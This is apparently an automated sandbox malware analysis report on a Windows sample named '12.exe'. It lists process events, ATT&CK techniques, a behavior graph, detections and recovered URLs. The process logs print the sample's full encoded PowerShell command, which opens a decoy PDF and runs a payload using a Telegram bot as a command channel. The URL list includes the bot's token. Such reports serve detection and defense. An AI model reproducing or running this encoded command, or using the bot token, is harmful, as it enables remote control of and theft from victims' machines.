lahmacwbhagcazqa/acqazabhahqayqaiaa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajabvafiasqagad4aiaakag4adqbsagwadqakacaaiaagacaaiaagacaaiab9aa0acgagacaaiaagah0aiablagwacwblacaaewanaaoaiaagacaaiaagacaaiaagacqazabhahqayqagad0aiaaiagmaaabhahqaxwbpagqapqakagyacgbvag0ajgb0aguaeab0ad0ajabyaguacwaiacaadqakacaaiaagacaaiaagacaaiaakafuaugbjacaapqagaciajabvafiataavahmazqbuagqatqblahmacwbhagcazqa/acq
Source: C:\Users\user\Desktop\12.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "start-process 'c:\users\user\appdata\local\temp\/file.pdf'; powershell.exe -e 'jabuag8aawblag4aiaa9acaaiga3aduanqa0admamaa3adyanga5adoaqqbbaeuaxwbsag4auqbuafkauwbyahyadqbzageaswbsagsacaboahiadgayaeqadgbzahuaqwa3aegaaabjadaacwawaciadqakacqavqbsaewaiaa9acaaigboahqadabwahmaogavac8ayqbwagkalgb0aguabablagcacgbhag0algbvahiazwavagiabwb0ahsamab9aciaiaatagyaiaakafqabwbraguabganaaoajabsageacwb0aekaraagad0aiaaxadiamwanaaoajabzagwazqblahaavabpag0azqagad0aiaayaa0acgakagkazablag4adabpagyaaqblahiaiaa9acaalqbqag8aaqbuacaakaaoadqaoaauac4anqa3ackaiab8acaarwblahqalqbsageabgbkag8abqagac0aqwbvahuabgb0acaanqagahwaiaalacaaewbbagmaaabhahiaxqakaf8afqapaa0acganaaoazgb1ag4aywb0agkabwbuacaasqbuahyabwbragualqbcag8adabdag0azaagahsadqakacaaiaagacaacabhahiayqbtacaakaanaaoaiaagacaaiaagacaaiaagacqaywbvag0abqbhag4azaanaaoaiaagacaaiaapaa0acgagacaaiaagahqacgb5acaaewanaaoaiaagacaaiaagacaaiaagacqacgblahmadqbsahqaiaa9acaasqbuahyabwbragualqbfahgacabyaguacwbzagkabwbuacgajabjag8abqbtageabgbkackadqakacaaiaagacaafqanaaoaiaagacaaiabjageadabjaggaiab7aa0acgagacaaiaagacaaiaagacaajabyaguacwb1agwadaagad0aiaakaeuacgbyag8acgbbadaaxqauaeuaeabjaguacab0agkabwbuaa0acgagacaaiaagah0adqakacaaiaagacaajabyaguacwagad0aiaaiafsajabpagqazqbuahqaaqbmagkazqbyaf0ajqawaeqajqawaeeaiganaaoaiaagacaaiaakahiazqbzahuabab0acaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsajabyaguacwagacsapqagafsacwb0ahiaaqbuagcaxqakaf8aiaaracaaigaladaaraaladaaqqaiah0adqakaa0acgagacaaiaagagkazgaoacqacgblahmaiaataguacqagaciaigapahsadqakacaaiaagacaaiaagacaaiaakagwayqbzahqasqbeacaapqagacqadqbwagqayqb0aguaaqbkaa0acgagacaaiaagacaaiaagacaaywbvag4adabpag4adqblaa0acgagacaaiaagah0adqakacaaiaagacaaaqbmacgajabyaguacwauaewazqbuagcadaboacaalqbnahqaiaa0adaaoqa1ackaewanaaoaiaagacaaiaagacaaiaagagyabwbyacaakaakagkaiaa9acaamaa7acaajabpacaalqbsahqaiaakahiazqbzac4atablag4azwb0aggaiaavacaanaawadkanqa7acaajabpacsakwapacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiaguazwbpag4aiaa9acaajabpacaakgagadqamaa5aduadqakacaaiaagacaaiaagacaaiaagacaaiaagacqazqbuagqaiaa9acaajabiaguazwbpag4aiaaracaanaawadkanaanaaoaiaagacaaiaagacaaiaagacaaiaagacaaaqbmacgajablag4azaagac0azwb0acaajabyaguacwauaewazqbuagcadaboackaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaakaguabgbkacaapqagacqacgblahmalgbmaguabgbnahqaaaanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabkageadabhacaapqagaciaywboageadabfagkazaa9acqazgbyag8abqamahqazqb4ahqapqaiacaakwagacqacgblahmawwakagiazqbnagkabgauac4ajablag4azabdaa0acgagacaaiaagacaaiaagacaaiaagacaaiaakafuaugbjacaapqagaciajabvafiataavahmazqbuagqatqblahmacwbhagcazqa/acqazabhahqayqaiaa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajabvafiasqagad4aiaakag4adqbsagwadqakacaaiaagacaaiaagacaaiab9aa0acgagacaaiaagah0aiablagwacwblacaaewanaaoaiaagacaaiaagacaaiaagacqazabhahqayqagad0aiaaiagmaaabhahqaxwbpagqapqakagyacgbvag0ajgb0aguaeab0ad0ajabyaguacwaiacaadqakacaaiaagacaaiaagacaaiaakafuaugbjacaapqagaciajabvaJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -e jabuag8aawblag4aiaa9acaaiga3aduanqa0admamaa3adyanga5adoaqqbbaeuaxwbsag4auqbuafkauwbyahyadqbzageaswbsagsacaboahiadgayaeqadgbzahuaqwa3aegaaabjadaacwawaciadqakacqavqbsaewaiaa9acaaigboahqadabwahmaogavac8ayqbwagkalgb0aguabablagcacgbhag0algbvahiazwavagiabwb0ahsamab9aciaiaatagyaiaakafqabwbraguabganaaoajabsageacwb0aekaraagad0aiaaxadiamwanaaoajabzagwazqblahaavabpag0azqagad0aiaayaa0acgakagkazablag4adabpagyaaqblahiaiaa9acaalqbqag8aaqbuacaakaaoadqaoaauac4anqa3ackaiab8acaarwblahqalqbsageabgbkag8abqagac0aqwbvahuabgb0acaanqagahwaiaalacaaewbbagmaaabhahiaxqakaf8afqapaa0acganaaoazgb1ag4aywb0agkabwbuacaasqbuahyabwbragualqbcag8adabdag0azaagahsadqakacaaiaagacaacabhahiayqbtacaakaanaaoaiaagacaaiaagacaaiaagacqaywbvag0abqbhag4azaanaaoaiaagacaaiaapaa0acgagacaaiaagahqacgb5acaaewanaaoaiaagacaaiaagacaaiaagacqacgblahmadqbsahqaiaa9acaasqbuahyabwbragualqbfahgacabyaguacwbzagkabwbuacgajabjag8abqbtageabgbkackadqakacaaiaagacaafqanaaoaiaagacaaiabjageadabjaggaiab7aa0acgagacaaiaagacaaiaagacaajabyaguacwb1agwadaagad0aiaakaeuacgbyag8acgbbadaaxqauaeuaeabjaguacab0agkabwbuaa0acgagacaaiaagah0adqakacaaiaagacaajabyaguacwagad0aiaaiafsajabpagqazqbuahqaaqbmagkazqbyaf0ajqawaeqajqawaeeaiganaaoaiaagacaaiaakahiazqbzahuabab0acaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsajabyaguacwagacsapqagafsacwb0ahiaaqbuagcaxqakaf8aiaaracaaigaladaaraaladaaqqaiah0adqakaa0acgagacaaiaagagkazgaoacqacgblahmaiaataguacqagaciaigapahsadqakacaaiaagacaaiaagacaaiaakagwayqbzahqasqbeacaapqagacqadqbwagqayqb0aguaaqbkaa0acgagacaaiaagacaaiaagacaaywbvag4adabpag4adqblaa0acgagacaaiaagah0adqakacaaiaagacaaaqbmacgajabyaguacwauaewazqbuagcadaboacaalqbnahqaiaa0adaaoqa1ackaewanaaoaiaagacaaiaagacaaiaagagyabwbyacaakaakagkaiaa9acaamaa7acaajabpacaalqbsahqaiaakahiazqbzac4atablag4azwb0aggaiaavacaanaawadkanqa7acaajabpacsakwapacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiaguazwbpag4aiaa9acaajabpacaakgagadqamaa5aduadqakacaaiaagacaaiaagacaaiaagacaaiaagacqazqbuagqaiaa9acaajabiaguazwbpag4aiaaracaanaawadkanaanaaoaiaagacaaiaagacaaiaagacaaiaagacaaaqbmacgajablag4azaagac0azwb0acaajabyaguacwauaewazqbuagcadaboackaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaakaguabgbkacaapqagacqacgblahmalgbmaguabgbnahqaaaanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabkageadabhacaapqagaciaywboageadabfagkazaa9acqazgbyag8abqamahqazqb4ahqapqaiacaakwagacqacgblahmawwakagiazqbnagkabgauac4ajablag4azabdaa0acgagacaaiaagacaaiaagacaaiaagacaaiaakafuaugbjacaapqagaciajabvafiataavahmazqbuagqatqblahmacwbhagcazqa/acqazabhahqayqaiaa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajabvafiasqagad4aiaakag4adqbsagwadqakacaaiaagacaaiaagacaaiab9aa0acgagacaaiaagah0aiablagwacwblacaaewanaaoaiaagacaaiaagacaaiaagacqazabhahqayqagad0aiaaiagmaaabhahqaxwbpagqapqakagyacgbvag0ajgb0aguaeab0ad0ajabyaguacwaiacaadqakacaaiaagacaaiaagacaaiaakafuaugbjacaapqagaciajabvafiataavahmazqbuagqatqblahmacwbhagcazqa/acqJump to behavior
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767F11E30 cpuid 0_2_00007FF767F11E30
Source: C:\Users\user\Desktop\12.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00007FF767F0E138
Source: C:\Users\user\Desktop\12.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF767F0E99C
Source: C:\Users\user\Desktop\12.exeCode function: GetLocaleInfoW,0_2_00007FF767F0EA4C
Source: C:\Users\user\Desktop\12.exeCode function: GetLocaleInfoW,0_2_00007FF767F06718
Source: C:\Users\user\Desktop\12.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF767F0EB80
Source: C:\Users\user\Desktop\12.exeCode function: EnumSystemLocalesW,0_2_00007FF767F0E494
Source: C:\Users\user\Desktop\12.exeCode function: EnumSystemLocalesW,0_2_00007FF767F0E564
Source: C:\Users\user\Desktop\12.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF767F0E5FC
Source: C:\Users\user\Desktop\12.exeCode function: EnumSystemLocalesW,0_2_00007FF767F06384
Source: C:\Users\user\Desktop\12.exeCode function: GetLocaleInfoEx,FormatMessageA,0_2_00007FF767EF6A04
Source: C:\Users\user\Desktop\12.exeCode function: GetLocaleInfoW,0_2_00007FF767F0E844
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: unknown VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: unknown VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: unknown VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF767EF8CFC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF767EF8CFC

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		11
Process Injection		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		31
Virtualization/Sandbox Evasion		LSASS Memory41
Security Software Discovery		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS31
Virtualization/Sandbox Evasion		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials2
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync42
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1590581 Sample: 12.exe Startdate: 14/01/2025 Architecture: WINDOWS Score: 92 33 Malicious sample detected (through community Yara rule) 2->33 35 Multi AV Scanner detection for submitted file 2->35 37 Sigma detected: PowerShell Base64 Encoded Invoke Keyword 2->37 39 4 other signatures 2->39 9 12.exe 1 2->9         started        12 svchost.exe 1 1 2->12         started        process3 dnsIp4 41 Suspicious powershell command line found 9->41 43 Encrypted powershell cmdline option found 9->43 15 powershell.exe 3 16 9->15         started        31 127.0.0.1 unknown unknown 12->31 signatures5 process6 signatures7 45 Malicious encrypted Powershell command line found 15->45 47 Encrypted powershell cmdline option found 15->47 18 Acrobat.exe 80 15->18         started        20 powershell.exe 14 15 15->20         started        23 conhost.exe 15->23         started        process8 dnsIp9 25 AcroCEF.exe 107 18->25         started        29 149.154.167.220 TELEGRAMRU United Kingdom 20->29 process10 process11 27 AcroCEF.exe 25->27         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
12.exe17%VirustotalBrowse
12.exe16%ReversingLabsWin64.Adware.RedCap

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://api.telegrP0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.4155343764.000001A33EBAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.4184547128.000001A34D25A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.4184547128.000001A34D391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4207742599.000001D5CF392000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4207742599.000001D5CF250000.00000004.00000800.00020000.00000000.sdmpfalse
    		high
    http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000001.00000002.4155343764.000001A33E6E6000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.5.drfalse
        		high
        https://api.telegram.orgpowershell.exe, 00000004.00000002.4155912559.000001D5C10B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF8E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0A86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1297000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF995000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF938000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFA67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0B43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFA8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFACB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF9B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF9E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1095000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1253000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1275000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFA3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFB13000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.4155912559.000001D5BF40C000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://api.telegram.org/botpowershell.exe, 00000004.00000002.4155912559.000001D5BF1E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF40C000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.4155912559.000001D5BF40C000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://go.micropowershell.exe, 00000004.00000002.4155912559.000001D5BFB23000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/Licensepowershell.exe, 00000004.00000002.4207742599.000001D5CF250000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://contoso.com/Iconpowershell.exe, 00000004.00000002.4207742599.000001D5CF250000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://crl.ver)svchost.exe, 00000006.00000002.3406586492.000001FD0B600000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://g.live.com/odclientsettings/ProdV2.C:qmgr.db.6.drfalse
                          		high
                          https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.4155912559.000001D5BF40C000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000006.00000003.1768733771.000001FD0B856000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drfalse
                              		high
                              https://g.live.com/odclientsettings/ProdV2qmgr.db.6.drfalse
                                		high
                                https://api.telegram.org/bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0Ppowershell.exe, 00000004.00000002.4155912559.000001D5BF40C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://crl.micropowershell.exe, 00000004.00000002.4214181744.000001D5D74C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.org/bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=powershell.exe, 00000004.00000002.4155912559.000001D5C10B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF8E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0A86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1297000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF995000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFA67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0B43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFA8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFACB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF9B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BF9E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C0D84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1095000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1253000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1275000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFA3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5BFB13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4155912559.000001D5C1053000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/powershell.exe, 00000004.00000002.4207742599.000001D5CF250000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.4155343764.000001A33EBAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.4184547128.000001A34D25A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.4184547128.000001A34D391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4207742599.000001D5CF392000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4207742599.000001D5CF250000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegrPpowershell.exe, 00000004.00000002.4155912559.000001D5C0523000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
